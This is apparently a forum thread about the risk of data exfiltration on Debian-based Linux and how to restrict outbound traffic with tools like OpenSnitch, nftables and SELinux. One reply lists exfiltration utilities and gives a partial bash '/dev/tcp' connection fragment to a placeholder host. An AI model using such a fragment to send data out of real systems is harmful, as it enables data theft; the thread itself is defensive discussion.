Linux daily driver data exfiltration risk

undwersq

Wondering what's the risk of data exfiltration on debian-based distros via scp. Even reputable apps can be back-doored to exfiltrate data in the background using scp -r. There're app level firewalls on Windows (zone alarm) and mac (little snitch) that'll pop up if scp is run. Nothing equivalent on linux (opensnitch etc can cause kernel panic).

mrket

undwersq What makes you think a "backdoored" app needs to use specifically scp for this?

Any app with access to your data and access to the network can send your data anywhere it wants.

You're looking at the issue backwards, what you likely want is to restrict the data the app can access in the first place.

randominternetuser

undwersq data exfiltration or backdooring a system can be done with many utilities like curl, wget, rsync, scp, nc, ... or even plain bash (exec 3<> /dev/tcp/host.com/443 ...). And as the others users pointed out, the apps can simply open outbound connections to their servers and send whatever they want without using any system command.

OpenSnitch in particular can't cause a kernel panic, because it uses eBPF, a technology specifically designed to prevent this problem. If it causes a kernel panic is because of a bug in the kernel.

n3t_admin

I'm not sure what you are referring to? Do you mean an app running on the host will exfiltrate data via SCP?

undwersq

n3t_admin Yes, an app can have a backdoor to scp the home directory.

n3t_admin

undwersq then I have no idea what SCP is needed for. There are a dozen methods someone could exfiltrate data from your machine, SCP would be the least of my concerns. Even if it were disabled, do you think a hacker would just go "sorry Sir, have a nice day" or actually install an alternative? Assuming they already have escalated enough privileges to do just that?

undwersq

Is there a way to prevent these types of attack vectors on Debian-based distros? Seems more insecure than Windows and Mac with lack of user-land tools.

n3t_admin

undwersq these types of attack vectors

what are "these types"? You have to be more specific here.

jackFang

randominternetuser first solution is to harden your device os, you can setup nftables and disable all network access except to specific apps.

Do note nftables operate on layer 3, and if im not mistaken this may not block traffic from layer 2 so if you're looking for higher security assurance, you'd also want to configure router itself with openwrt as an example to manage networking

chinook

Well, selinux or Qubes OS then? I think it's the only way to give you some good results.